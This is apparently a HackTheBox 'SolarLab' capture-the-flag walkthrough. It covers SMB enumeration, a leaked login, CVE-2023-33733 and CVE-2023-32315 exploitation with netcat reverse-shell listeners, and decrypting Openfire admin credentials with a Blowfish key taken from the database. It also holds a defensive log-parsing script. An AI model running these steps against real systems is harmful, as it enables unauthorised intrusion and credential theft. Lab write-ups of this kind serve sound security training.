SolarLab is a medium-difficulty Windows machine from HackTheBox. It initially involves a sensitive information leak through SMB that grants us dashboard access to ReportHub, where CVE-2023-33733 gets us the user flag. For root, it involves exposing the internal Openfire application and exploiting CVE-2023-32315 to gain remote code execution, then decrypting some Openfire database credentials to reach Administrator. Fun box to tackle :)
```
PS C:\Users\0xkujen> nmap -A -Pn -p- -T4 10.129.231.39
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-19 17:12 W. Central Africa Standard Time
NSOCK ERROR [0.2590s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.129.231.39
Host is up (0.091s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT        ADDRESS
1   2559.00 ms 10.10.16.1
2   2559.00 ms 10.129.231.39

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 508.86 seconds
```
We can see that we have web applications running on ports 80 and 6791. The latter redirects us to http://report.solarlab.htb:6791/, so let's go ahead and add that hostname to our /etc/hosts file.
SMB - 445
Since port 445 is open, let's check for any SMB shares that we might be able to access:
```
┌──(kali㉿kali)-[~/hackthebox/solarlab]
└─$ smbclient //solarlab.htb/Documents -U Guest
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

		7779839 blocks of size 4096. 1898529 blocks available
smb: \> mget *
Get file desktop.ini? y
getting file \desktop.ini of size 278 as desktop.ini (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Get file details-file.xlsx? y
getting file \details-file.xlsx of size 12793 as details-file.xlsx (37.1 KiloBytes/sec) (average 19.7 KiloBytes/sec)
Get file old_leave_request_form.docx? y
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (67.6 KiloBytes/sec) (average 41.4 KiloBytes/sec)
smb: \> exit
```
We find a few files, which we download; checking the Excel sheet, we find some interesting stuff:

[Screenshot: Excel Sheet]
I also noticed that the usernames we just acquired have different formats: firstname.lastname and firstnameL. So I tried to log in using the usernames' different formats and passwords, and got a valid login for BlakeB:ThisCanB3typedeasily1@, and we are in:

[Screenshot: Dashboard]
Googling for some exploits within ReportHub, I stumbled upon CVE-2023-33733, a code execution vulnerability in the ReportLab Python library, which grants us a reverse shell on the system:

[Screenshot: CVE]
And we are in:
```
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.231.39] 50711
Windows PowerShell running as user blake on SOLARLAB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/16/2023   9:39 PM                Common Files
d-----         4/26/2024   4:39 PM                Internet Explorer
d-----        11/17/2023  10:04 AM                Java
d-----        11/16/2023   9:47 PM                Microsoft Update Health Tools
d-----         12/7/2019  11:14 AM                ModifiableWindowsApps
d-----        11/17/2023   2:22 PM                Openfire
d-----         4/26/2024   2:38 PM                RUXIM
d-----          5/3/2024   2:34 PM                VMware
d-----        11/16/2023  11:12 PM                Windows Defender
d-----         4/26/2024   4:39 PM                Windows Defender Advanced Threat Protection
d-----        11/16/2023  10:11 PM                Windows Mail
d-----        11/16/2023  10:11 PM                Windows Media Player
d-----         4/26/2024   4:39 PM                Windows Multimedia Platform
d-----         12/7/2019  11:50 AM                Windows NT
d-----        11/16/2023  10:11 PM                Windows Photo Viewer
d-----         4/26/2024   4:39 PM                Windows Portable Devices
d-----         12/7/2019  11:31 AM                Windows Security
d-----         12/7/2019  11:31 AM                WindowsPowerShell

PS C:\>
```
Looking for Openfire CVEs, I stumbled upon CVE-2023-32315, which requires Openfire to be exposed on port 9090. Checking our network connections, we actually find the system listening on 9090:
For the exploit to work, we just have to upload an openfire-management-tool-plugin.jar file, which gives us a server management tool with a default password of 123:
[Screenshot: Openfire]

We now head over to server => server settings => Management Tool, and we have command execution:

[Screenshot: Openfire]
Let's get a shell again :)
```
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.231.39] 50801
Windows PowerShell running as user openfire on SOLARLAB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files\Openfire\embedded-db> cat openfire.log
/*C2*/SET SCHEMA PUBLIC
DELETE FROM OFPROPERTY WHERE NAME='update.lastCheck'
INSERT INTO OFPROPERTY VALUES('update.lastCheck','1726761418536',0,NULL)
COMMIT
INSERT INTO OFUSER VALUES('i0uve6',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'001726769280888','001726769280888')
COMMIT
DELETE FROM OFUSER WHERE USERNAME='i0uve6'
INSERT INTO OFUSER VALUES('i0uve6','VNGmwfXwdo9wfY2nkriUkaJi8Ec=','C8qYvY6k+/+jo9GBh+Xbl1dHNcc=','ZMM5aglF85dyWmtxnCPLUhxWMy0ACDpi',4096,NULL,'83de4c9dc7043ae63713c55a0fc58b0048a84bb5a3202174',NULL,NULL,'001726769280888','001726769280888')
COMMIT
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','[email protected],[email protected]',0,NULL)
COMMIT
DELETE FROM OFID WHERE IDTYPE=25
INSERT INTO OFID VALUES(25,4)
COMMIT
INSERT INTO OFSECURITYAUDITLOG VALUES(3,'i0uve6',1726769313246,'Successful admin console login attempt','solarlab.htb','The user logged in successfully to the admin console from address 127.0.0.1. ')
COMMIT
DELETE FROM OFID WHERE IDTYPE=25
INSERT INTO OFID VALUES(25,5)
COMMIT
INSERT INTO OFSECURITYAUDITLOG VALUES(4,'i0uve6',1726769468048,'uploaded plugin ','solarlab.htb',NULL)
COMMIT
DELETE FROM OFID WHERE IDTYPE=25
INSERT INTO OFID VALUES(25,6)
COMMIT
INSERT INTO OFSECURITYAUDITLOG VALUES(5,'i0uve6',1726769484353,'uploaded plugin openfire-management-tool-plugin.jar','solarlab.htb',NULL)
COMMIT
PS C:\Program Files\Openfire\embedded-db>
```
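Seen from the defender's side, the rows that landed in this log are exactly what an Openfire administrator would want alerting on: a freshly created account, a change to admin.authorizedJIDs, an admin console login by that account and a plugin upload. The following is an added example, not code from the writeup or from Openfire: a small parser for the HSQLDB statement log that flags those events. The sample log is constructed to mirror the rows above (same tables and column order); the JIDs are placeholder addresses.

```python
import re
from datetime import datetime, timezone

# Constructed sample in the shape of the HSQLDB openfire.log shown above
# (same tables and columns; JIDs replaced with placeholder addresses).
SAMPLE_LOG = """\
/*C2*/SET SCHEMA PUBLIC
INSERT INTO OFUSER VALUES('i0uve6',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'001726769280888','001726769280888')
COMMIT
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@example.invalid,i0uve6@example.invalid',0,NULL)
INSERT INTO OFSECURITYAUDITLOG VALUES(3,'i0uve6',1726769313246,'Successful admin console login attempt','solarlab.htb','The user logged in successfully to the admin console from address 127.0.0.1. ')
INSERT INTO OFSECURITYAUDITLOG VALUES(5,'i0uve6',1726769484353,'uploaded plugin openfire-management-tool-plugin.jar','solarlab.htb',NULL)
"""

_INSERT = re.compile(r"^INSERT INTO (\w+) VALUES\((.*)\)$")
_TOKEN = re.compile(r"'((?:[^']|'')*)'|(NULL)|(-?\d+)")  # quoted string | NULL | integer

def parse_insert(line):
    """Split one HSQLDB INSERT statement into (table, [values]); None for other lines."""
    m = _INSERT.match(line.strip())
    if m is None:
        return None
    values = []
    for text, null, num in _TOKEN.findall(m.group(2)):
        values.append(None if null else int(num) if num else text.replace("''", "'"))
    return m.group(1), values

def audit_findings(log_text):
    """Return (kind, user, detail) tuples for: account creation, admin-list changes,
    plugin uploads, and admin-console logins by an account created earlier in the log."""
    findings, new_users = [], set()
    for line in log_text.splitlines():
        parsed = parse_insert(line)
        if parsed is None:
            continue
        table, vals = parsed
        if table == "OFUSER" and vals[0] not in new_users:   # column 0 is USERNAME
            new_users.add(vals[0])
            findings.append(("account_created", vals[0], None))
        elif table == "OFPROPERTY" and vals[0] == "admin.authorizedJIDs":
            findings.append(("admin_list_changed", None, vals[1]))
        elif table == "OFSECURITYAUDITLOG":
            _rowid, user, ts_ms, summary, _node, _details = vals
            when = datetime.fromtimestamp(ts_ms / 1000, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
            if summary.startswith("uploaded plugin"):
                findings.append(("plugin_upload", user, f"{when} {summary.strip()}"))
            elif "admin console login" in summary and user in new_users:
                findings.append(("new_admin_login", user, when))
    return findings
```

Run against the real embedded-db/openfire.log, the same four findings appear for the i0uve6 account, with the login and the plugin upload a few minutes apart.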
It references a user named admin. Checking openfire.script, we find the admin user's encrypted password:
```
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
```
In order to decrypt an Openfire password, I used this tool. The tool needs the Blowfish key:

[Screenshot: Openfire]
Which we can easily acquire from the script file:
```
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
```